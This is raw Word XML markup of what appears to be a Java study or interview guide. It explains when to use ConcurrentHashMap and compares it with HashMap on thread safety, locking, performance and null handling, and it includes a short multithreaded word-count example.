    <w:p w14:paraId="08A37B72" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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ncurrentHashMap&lt;String, Integer&gt; wordCountMap = new ConcurrentHashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C37BF1" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20767085" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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imulating multiple threads counting words in different parts of the text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC758FC" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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words = text.split(" ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CADB501" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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xecutorService executor = Executors.newFixedThreadPool(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F05D223" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D5B5C55" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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or (String word : words) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F21DFF" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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xecutor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27756F71" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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ordCountMap.merge(word, 1, Integer::sum);  // thread-safe word counting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F41178B" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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F311300" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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8B2C93A" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DDEBB4A" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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xecutor.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C40496" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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hile (!executor.isTerminated()) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF0CE53" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07282C35" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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nt word counts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B34AFDE" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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wordCountMap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B9D7C" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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2E55C9D" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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41EC037" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A8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In Applications that Need Atomic Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC0B4E7" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87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currentHashMap provides atomic methods like putIfAbsent(), replace(), and computeIfAbsent() to perform operations on the map in an atomic manner, which can be helpful when you need to perform compound actions like inserting or updating a value if certain conditions are met, all while ensuring thread safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE8E13A" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A8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Not to Use ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1549B5" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A8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ile ConcurrentHashMap is great for concurrent read and write operations, there are some situations where it may not be the best choice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB98437" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87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When Full Synchronization is Required</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you need to perform complex, multi-step operations on the map that involve multiple keys or require locking the entire map (e.g., transactions), ConcurrentHashMap may not be suitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4111F531" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87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hen You Need to Synchronize Entire Map Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your operations need a global lock on the map, you may need to use Collections.synchronizedMap() or implement your own locking mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F83004" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:jc w:val="both"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In summary, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is ideal when you need a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly concurrent, thread-safe map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with minimal locking and good performance in multi-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E252B7B" w14:textId="3429D10C"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2DF1B5F">
          <v:rect id="_x0000_i1586" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="064E557F" w14:textId="77777777" w:rsidR="00ED664A" w:rsidRPr="00CE4B95" w:rsidRDefault="00ED664A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="193" w:name="_Toc196307673"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain HashMap vs ConcurrentHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:p w14:paraId="768E0D51" w14:textId="56FA79C5" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">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ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are both part of Java's collections framework, but they have key differences related to thread safety, performance, and usage in multi-threaded environments. Here's a detailed comparison between the two:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A1D908" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92D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Thread Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560FE471" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABBA967" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="87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t thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If multiple threads access a HashMap concurrently and at least one of them modifies the map, it must be synchronized externally. Otherwise, it can lead to inconsistent or incorrect data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5EB2E7" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="87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you need thread safety with HashMap, you can use Collections.synchronizedMap() or explicitly synchronize it using synchronized blocks or methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680223A1" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87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tHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351DBDEB" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="87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safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It is designed to handle concurrent access by multiple threads without external synchronization. Multiple threads can read and write to different parts of the map concurrently without causing data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510B9F76" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="87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achieves this by </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segmenting</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the map internally (in earlier versions) or using fine-grained locking (in Java 8 and later), which allows concurrent operations on different sections of the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F14975" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92D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Locking Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549BF44E" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF83644" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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re is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism in HashMap. If you need to ensure thread safety during concurrent operations, you must handle it yourself using synchronization techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646B80E" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520FB38C" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fine-grained locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. In earlier versions of ConcurrentHashMap (Java 7 and before), the map was divided into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and each segment was locked independently. This allowed multiple threads to access different segments of the map concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F67E01F" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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8+, it uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bucket-level locking</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CAS (Compare-And-Swap)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for atomic operations, making it much more scalable when handling concurrent reads and writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0DCC13" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92D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Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5A9AF8" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F7DA0F" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ince HashMap is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, it performs better in single-threaded applications or when external synchronization is applied, as it doesn’t have the overhead of synchronization built in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C75539B" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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is faster for non-concurrent access because it doesn’t have the overhead of managing concurrent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C153959" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6545F594" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. While ConcurrentHashMap may have some performance overhead compared to HashMap due to locking and atomic operations, it is much more efficient than other thread-safe maps (like Hashtable) when accessed by multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EB1E55" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrent reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without locking, making it faster in situations where read-heavy access is common.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F78E7A" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92D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Null Keys and Values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3121B1DE" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B1596D" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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llows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one null key</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multiple null values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This can be useful in cases where you want to store absent keys with a null value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0AB40" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44768B72" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not allow null keys</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null values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
